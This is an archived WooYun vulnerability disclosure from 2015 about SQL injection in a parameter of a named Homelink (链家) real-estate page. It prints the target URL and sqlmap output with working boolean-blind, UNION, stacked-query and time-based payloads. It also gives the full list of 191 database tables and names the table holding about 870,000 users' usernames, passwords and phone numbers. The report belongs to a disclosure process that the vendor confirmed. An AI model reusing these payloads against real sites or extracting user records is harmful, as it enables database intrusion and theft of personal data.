乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-28: 细节已通知厂商并且等待厂商处理中 2015-04-29: 厂商已经确认,细节仅向厂商公开 2015-05-09: 细节向核心白帽子及相关领域专家公开 2015-05-19: 细节向普通白帽子公开 2015-05-29: 细节向实习白帽子公开 2015-06-13: 细节向公众公开
http://huodong.homelink.com.cn/xinfang/seckill.php?cid=24
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=24 AND 6904=6904 Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: cid=-7099 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7172716871,0x756a546c425a62466a65,0x7167796c71),NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: cid=24; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cid=24 AND SLEEP(5)---web application technology: PHP 5.4.28back-end DBMS: MySQL 5.0.11Database: homelink[191 tables]+---------------------------------------------+| app_pic || comm_his_trans_record || community || community_pic || community_relate_subwayline_walktime || decoration_company || decoration_company_complaints || decoration_company_dic || decoration_company_pic || decoration_company_plan || decoration_company_plan_audit_log || decoration_company_share_comm || decoration_company_users || district || district_business || era_agent || era_agent_community || era_agent_complain || era_agent_familiar_area || era_agent_four_phone || era_agent_four_phone_stat || era_agent_permission || era_agent_pic || era_agent_pic_dic || era_agent_school_pic || era_agent_school_pic_dic || era_basis_subway_line || era_basis_subway_station || era_basis_subway_station_community_relation || era_building_year || era_com_app_version || era_comment_failure_history || era_comment_report || era_community_agent_rank || era_community_app_push || era_community_build_relation || era_community_com_log || era_community_com_pic || era_community_comments || era_community_frame_base_info || era_community_frame_pic || era_community_his_price || era_community_impression || era_community_index_bottom || era_community_master || era_community_nearby_community || era_community_periphery || era_customer_house || era_details_see_community || era_details_see_house || era_faq_answers || era_faq_asked_question || era_faq_category || era_faq_suggested_experts || era_faq_suggested_keywords || era_for_searcher || era_for_searcher_subway || era_frontpage_recommend || era_house || era_house_accues || era_house_com_delete || era_house_comment || era_house_comment_dic || era_house_list_agnet || era_house_modify_logs || era_house_notification || era_house_pic || era_house_price_change || era_map_heat_data || era_no_synchronization_pic || era_org || era_owner_house_comment || era_owner_house_comment_dic || era_owner_score || era_rank_dic || era_school_best_comm || era_school_building_relation || era_school_cj || era_school_comment || era_school_comment_agents || era_school_comment_dic || era_school_community_stat || era_school_counterpart_periphery || era_school_district_info || era_school_label || era_school_pic || era_se_agent_assess || era_se_customer || era_see_house || era_see_house_assess || era_see_house_middle || era_store_community || era_store_community_relation || era_user_favorites || era_user_orbit_collect_five || era_user_orbit_collect_four || era_user_orbit_collect_one || era_user_orbit_collect_three || era_user_orbit_collect_two || era_user_orbit_interest_house || era_user_orbit_s_analyze_result || era_user_orbit_s_area_analyze || era_user_orbit_s_bbd_analyze || era_user_orbit_s_comm_analyze || era_user_orbit_s_floor_analyze || era_user_orbit_s_fyear_analyze || era_user_orbit_s_ho_analyze || era_user_orbit_s_price_analyze || era_user_orbit_s_room_analyze || era_user_orbit_similar_business || era_user_orbit_similar_comm || era_user_push_hid || era_user_recommend || fphone_agent_change_city_log || fphone_base_info || fphone_pri_bind_route_set || fphone_pri_ext_add || fphone_pri_route_add || house_count || house_hot_recommend_bak || job_log || kettle_job_log || kettle_setp_log || kettle_trans_log || licai_mobile || nanjing_yz_entrust || new_community || new_community_bk || new_community_comment || new_community_dict || new_community_frame || new_community_near_comm || new_community_pic || new_community_user || new_communtiy_panic_buying || new_communtiy_panic_buying_record || pg_bdm_element || pg_business_trend || pg_city_trend || pg_community_trend || pg_factor_dict || pg_factor_type || pg_rent_example || pg_user_transaction || pinyin || temp_true_house || tj_house || tj_house_pic || tj_house_preference || tj_qi || tj_user || v_era_se_agent_assess || v_web_user_clinet || wct_no_synchronization_pic || web_admin || web_admin_phone || web_ads || web_ads_position || web_broker || web_group || web_log || web_menu || web_score_active_user || web_score_address || web_score_aduser || web_score_details || web_score_order || web_score_shop || web_score_usercount || web_score_xls || web_search_log || web_user_client || web_user_login || web_user_mobile || web_zhuanti || web_zhuanti_era || web_zhuanti_keywords || yz_entrust || yz_follow_up || zt_bj_temp_true_house || zt_bj_temp_true_house_num || zt_bj_temp_true_house_pj || zt_bj_video_house || zt_cdzhenfy || zt_countrysite_draw || zt_countrysite_drawlog || zt_countrysite_userinfo || zt_qdmuxiao2014_20140730 || zt_qdmuxiao2014_record || zt_shanghai_draw || zt_shanghai_drawlist |+---------------------------------------------+
看了一下,数据和 WooYun: 链家官网SQL注射可导致70w用户信息泄露 差不多,只不过现在数据是87万了~用户信息在web_user_client表中:
取某些字段(用户名,密码,手机)来看看:
危害等级:高
漏洞Rank:20
确认时间:2015-04-29 10:02
谢谢对链家安全的关注。
暂无